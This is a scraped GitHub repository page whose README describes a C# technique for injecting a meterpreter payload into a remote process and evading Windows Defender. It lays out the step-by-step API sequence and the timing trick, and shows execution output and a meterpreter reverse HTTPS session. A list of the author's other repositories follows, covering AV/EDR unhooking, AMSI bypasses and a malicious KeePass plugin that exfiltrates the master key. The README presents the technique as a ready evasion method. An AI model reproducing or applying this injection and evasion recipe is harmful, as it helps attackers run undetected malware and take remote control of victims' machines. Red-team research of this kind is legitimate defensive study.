plackyhacker/Suspended-Thread-Injection plackyhacker/Suspended-Thread-Injection

  • Stars
    star
    248
  • Rank 163,560 (Top 4 %)
  • Language
    C#
  • Created about 3 years ago
  • Updated about 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
plackyhacker/Suspended-Thread-Injection
github

plackyhacker

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Another meterpreter injection technique using C# that attempts to bypass Defender

Suspended Thread Injection

Another meterpreter injection technique using C# that attempts to bypass Defender.

If you do use any of the code in these repositories keep it legal!

Introduction

This code was written after reading Bypassing Windows Defender Runtime Scanning by F-Secure Labs. The technique I have written isn't the same but it got me thinking about how I can inject meterpreter into a remote process and go under the Defender radar.

The technique is quite simple:

  • Open a remote process using OpenProcess.
  • Decrypt the meterpreter payload in memory.
  • Allocate some memory in the remote process using VirtualAllocEx, ensuring we assign the correct permissions to write to the memory of course.
  • Write our payload into the allocated memory using WriteProcessMemory.
  • Protect the memory using VirtualProtectEx, setting the protection to PAGE_NOACCESS.
  • Create a new suspended thread using CreateRemoteThread.
  • Sleep for 10 seconds while Defender scans the remote process memory for malicious code.
  • Change the protection on the memory using VirtualProtectEx, setting the protection to PAGE_EXECUTE_READ_WRITE.
  • Resuming the remote thread using ResumeThread

It would appear that protecting the page with PAGE_NOACCESS containing our meterpreter shellcode is not scanned by Defender and is not detected. By suspending the thread upon creation we are able to 'hold' the shellcode in memory until Defender has done it's scan then execute the shellcode when Defender has finished.

Important

Remember, the code looks for an instance of notepad to inject into, it is trivial to change this, or even spawn a surregate process to inject in to.

Example

Execution of the code is shown below:

[+] OpenProcess with PID 49416.
[+] VirtualAllocEx (PAGE_EXECUTE_READ_WRITE) on 0x2C4.
[+] WriteProcessMemory to 0x247A8CE0000.
[+] VirtualProtectEx (PAGE_NOACCESS) on 0x247A8CE0000.
[+] CreateRemoteThread (suspended) to 0x247A8CE0000.
[+] Sleeping whilst Defender scans the remote process.
[+] VirtualProtectEx (PAGE_EXECUTE_READ_WRITE) on 0x247A8CE0000.
[+] Resume thread 0x368.

And the meterpreter shell:

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://192.168.1.228:443
[*] https://192.168.1.228:443 handling request from 192.168.1.142; (UUID: lsezjczd) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.228:443 -> 192.168.1.142:60433) at 2021-10-07 08:32:00 +0100

AV Scan Results

The binary was scanned using antiscan.me on 07/10/2021.

AV Scan

Notes

Tested with windows/x64/meterpreter/reverse_https on Windows 10 Pro (build 10.0.19042) with Defender.

More Repositories

1

Shellcode-Encryptor

A simple shell code encryptor/decryptor/executor to bypass anti virus.
C#
462
star
2

Shellcode-Injection-Techniques

A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV.
C#
439
star
3

SandboxDefender

C# code to Sandbox Defender (and most probably other AV/EDRs).
C#
163
star
4

Peruns-Fart

Perun's Fart (Slavic God's Luck). Another method for unhooking AV and EDR, this is my C# version.
C#
105
star
5

CmdLineSpoofer

How to spoof the command line when spawning a new process from C#.
C#
96
star
6

Sys-Calls

An example of using Syscalls in C# to get a meterpreter shell.
C#
95
star
7

Unhook-BitDefender

Unhooks Bit Defender from NTDLL and KERNELBASE using a classic technique.
C#
50
star
8

AMSI-Bypass

Another AMSI bypass - but in C++.
C++
24
star
9

ps-encoder

A very simple python script to encode and decode PowerShell one-liners.
Python
21
star
10

PowerGhost

A custom run space to bypass AMSI and Constrained Language mode in PowerShell.
C#
19
star
11

Malicious-KeePass-Plugin

A malicious KeePass plugin to exfiltrate the master key.
C#
15
star
12

DynamicEarlyBird

An example of using Dynamic Invoke to Inject Shellcode using the Early Bird Method.
C#
11
star
13

impersonator

C++ code to impersonate a Windows token and spawn a new process.
C++
5
star
14

misc-scripts

Miscellaneous Scripts
Python
5
star
15

Enumeration

Some .Net assemblies used to enumerate a host. Best when they are loaded in to memory.
C#
4
star
16

plackyhacker.github.io

Python
3
star
17

msgbox

Host a non-malicious shellcode
PowerShell
3
star
18

HEVD

My exploits for the HackSys Vulnerable Driver Project
C++
2
star
19

passwordgenerator

Generate three random word password lists quickly
Python
2
star
20

SecureCode1

Python exploit for the VulnHub OSWE practice box 'SecureCode1'
Python
2
star
21

marra

Marra
PowerShell
1
star
22

Sliver-Extension-Template

A Sliver Extension Template
C++
1
star